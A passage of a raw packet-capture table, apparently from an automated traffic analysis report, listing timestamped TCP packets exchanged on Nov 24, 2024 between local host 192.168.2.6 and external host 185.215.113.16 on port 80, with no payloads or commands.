                                                                                                                                                                                              Nov 24, 2024 13:39:29.902348995 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.902447939 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.902493000 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.903176069 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.903309107 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.903373003 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.904093981 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.904134989 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.904174089 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.904952049 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.905080080 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.905128956 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.905833006 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.905883074 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.905929089 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.907120943 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.907166958 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.907180071 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.907597065 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.907640934 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.907742023 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.908495903 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.908545971 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.908628941 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.909383059 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.909776926 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.953071117 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:30.037765026 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.037879944 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.037944078 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:30.038214922 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.038326979 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.038758993 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:30.039051056 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.039151907 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.039195061 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:30.039910078 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.076642990 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.076697111 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:30.076733112 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.076910019 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.076926947 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.076951981 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:30.077948093 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.077999115 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:30.078068972 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.078677893 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.078753948 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.078809977 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:30.079588890 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.079662085 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.079709053 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:30.080398083 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.080449104 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:30.080518961 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.081331968 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.081374884 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:30.081382990 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.082196951 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.082246065 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:30.082344055 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.083070993 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.083122015 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:30.083125114 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.083925962 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.083966970 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:30.084023952 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.084830999 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.084886074 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.084939957 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:30.085680962 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.085777998 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.085824013 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:30.086549997 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.086595058 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:30.086684942 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.087528944 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.087544918 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.087574959 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:30.088321924 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.088362932 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:30.088449955 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.089200974 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.089346886 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.089395046 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:30.090158939 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.090272903 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.090315104 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:30.090953112 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.090997934 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:30.091094017 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.091809034 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.091857910 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:30.091928959 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.092713118 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.092750072 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:30.092839956 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.093719959 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.093777895 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.093827963 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:30.094461918 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.094625950 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.094674110 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:30.095364094 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.095412016 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:30.095464945 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.096214056 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.096262932 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:30.096267939 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.097104073 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.097120047 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.097142935 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:30.097982883 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.098082066 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.098136902 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:30.098848104 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.098993063 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:30.099035025 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.099731922 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.099780083 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:30.099812031 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.100611925 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.100660086 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:30.100702047 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.101490021 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.101533890 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:30.101545095 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.102396011 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.102519035 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.102571964 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:30.103260994 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.103372097 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.103382111 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:30.104135036 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.104182005 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:30.104233027 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.105014086 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.105062962 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:30.105139971 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.105904102 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.105964899 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:30.106041908 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.106766939 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.106868982 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.106923103 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:30.107636929 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.107758045 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.107804060 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:30.108536959 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.108587027 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:30.108674049 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.109448910 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.109497070 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:30.109579086 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.110378981 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.110424042 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:30.110493898 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.111172915 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.111263990 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.111321926 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:30.112029076 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.112185001 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.112231970 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:30.113009930 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.113054991 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:30.113147020 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.113833904 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.113882065 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:30.113909960 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.114675045 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.114716053 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:30.114804029 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.115569115 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.115708113 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.115761995 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:30.116462946 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.116566896 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.116612911 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:30.117311954 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.117357016 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:30.117425919 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.118230104 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.118273973 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.118278980 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:30.119060040 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.119102955 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:30.119174004 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.120004892 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.120651007 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:30.248294115 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.248457909 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.248522043 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:30.248761892 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.248814106 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.248862028 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:30.249651909 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.249809980 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.250236034 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:30.250540018 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.287430048 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.287573099 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.287614107 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:30.287689924 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.287739038 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:30.287831068 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.288549900 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.288604975 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:30.288686037 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.289798021 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.289856911 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:30.289912939 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.290678024 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.290725946 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:30.290802002 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.291382074 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.291512966 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.291575909 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:30.292454958 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.292520046 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.292571068 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:30.293204069 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.293263912 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:30.293395042 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.294044018 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.294184923 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.294234037 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:30.294754982 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.294821978 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:30.294864893 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.295633078 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.295681953 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:30.295726061 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.296468973 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.296576977 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.296631098 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:30.297360897 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.297549963 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.297599077 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:30.298316002 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.298393011 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.298455000 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:30.299158096 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.299201965 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:30.299283028 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.299988985 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.300064087 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:30.300091982 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.300879955 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.300981998 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.301039934 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:30.301734924 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.301831007 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:30.301868916 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.302645922 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.302695990 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:30.302784920 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.303508997 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.303550959 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:30.303809881 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.304400921 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.304521084 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.304559946 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:30.305227041 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.305356979 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.305411100 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:30.306130886 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.306325912 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.306381941 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:30.307038069 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.307087898 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:30.307128906 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.308171988 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.308264017 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:30.308269024 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.308902025 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.308917999 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.308984041 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:30.309638023 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.309758902 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.309824944 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:30.310578108 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.310601950 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.310647964 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:30.311413050 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.311465025 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:30.311557055 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.312304974 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.312345982 CET4975280192.168.2.6185.215.113.16
